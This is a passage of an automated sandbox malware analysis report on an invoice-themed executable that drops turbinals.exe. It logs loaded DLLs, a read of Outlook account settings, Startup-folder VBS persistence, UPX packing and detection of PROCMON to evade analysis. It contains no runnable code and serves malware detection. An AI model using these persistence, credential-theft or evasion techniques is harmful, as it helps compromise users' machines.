                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_01027A50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_01027A50
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EF8945 push ecx; ret 0_2_00EF8958
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D30080 push eax; iretd 2_2_00D30082
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D30079 push eax; iretd 2_2_00D3007A
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D3007C push eax; iretd 2_2_00D3007E
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D08945 push ecx; ret 2_2_00D08958
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF52AC push edx; iretd 2_2_00CF52D6
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF53C5 push edx; iretd 2_2_00CF53EA
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF53ED push edx; iretd 2_2_00CF53EE
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF53A0 push ecx; iretd 2_2_00CF538A
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF5358 push edx; iretd 2_2_00CF532A
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF5373 push ecx; iretd 2_2_00CF538A
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF5314 push edx; iretd 2_2_00CF532A
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF169B push ss; iretd 2_2_00CF169C
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeFile created: C:\Users\user\AppData\Local\acceptancy\turbinals.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbsJump to dropped file
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbsJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbsJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00ED48D7
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F55376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00F55376
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CE48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00CE48D7
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D65376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00D65376
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EF3187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EF3187
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: turbinals.exe, 00000002.00000002.1313569997.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000002.00000003.1299290666.000000000105C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000002.00000003.1299410643.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000003.1428885907.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000002.1437261623.000000000121E000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000003.1429031274.000000000121E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXESJ
                    Source: turbinals.exe, 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1312007585.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1311883235.000000000155C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000003.1428885907.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000002.1437261623.000000000121E000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000003.1429031274.000000000121E000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000A.00000002.1447997256.0000000001233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                    Source: turbinals.exe, 0000000B.00000002.1457731800.000000000119D000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000B.00000003.1447910537.000000000112C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000B.00000003.1448090836.000000000119D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE;
                    Source: turbinals.exe, 0000000D.00000002.1465173386.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000D.00000003.1457043234.000000000128C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000D.00000003.1457205214.00000000012FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXES+
                    Source: turbinals.exe, 0000000D.00000002.1465173386.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000D.00000003.1457043234.000000000128C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000D.00000003.1457205214.00000000012FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEM
                    Source: turbinals.exe, 0000000A.00000002.1448026199.0000000001251000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXES]
                    Source: turbinals.exe, 00000002.00000002.1313569997.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000002.00000003.1299290666.000000000105C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000002.00000003.1299410643.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3760192225.000000000169F000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000B.00000002.1457731800.000000000119D000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000B.00000003.1447910537.000000000112C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000B.00000003.1448090836.000000000119D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXES
                    Source: z49FACTURA-0987678.exe, 00000000.00000003.1291243998.000000000124D000.00000004.00000020.00020000.00000000.sdmp, z49FACTURA-0987678.exe, 00000000.00000003.1291126044.00000000011DC000.00000004.00000020.00020000.00000000.sdmp, z49FACTURA-0987678.exe, 00000000.00000002.1299306959.000000000124D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEW
                    Source: z49FACTURA-0987678.exe, 00000000.00000003.1291243998.000000000124D000.00000004.00000020.00020000.00000000.sdmp, z49FACTURA-0987678.exe, 00000000.00000003.1291126044.00000000011DC000.00000004.00000020.00020000.00000000.sdmp, z49FACTURA-0987678.exe, 00000000.00000002.1299306959.000000000124D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXESG
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeWindow / User API: threadDelayed 568Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeWindow / User API: threadDelayed 8916Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeWindow / User API: foregroundWindowGot 1766Jump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105417
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeAPI coverage: 4.5 %
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeAPI coverage: 4.4 %
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe TID: 7800Thread sleep time: -118000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe TID: 7804Thread sleep time: -1704000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe TID: 7804Thread sleep time: -26748000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F3445A
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3C6D1 FindFirstFileW,FindClose,0_2_00F3C6D1
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F3C75C
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F3EF95
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F3F0F2
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F3F3F3
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F337EF
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F33B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F33B12
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F3BCBC
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D4445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_00D4445A
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D4C6D1 FindFirstFileW,FindClose,2_2_00D4C6D1
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00D4C75C
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D4EF95
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D4F0F2
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D4F3F3
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00D437EF
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00D43B12
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D4BCBC
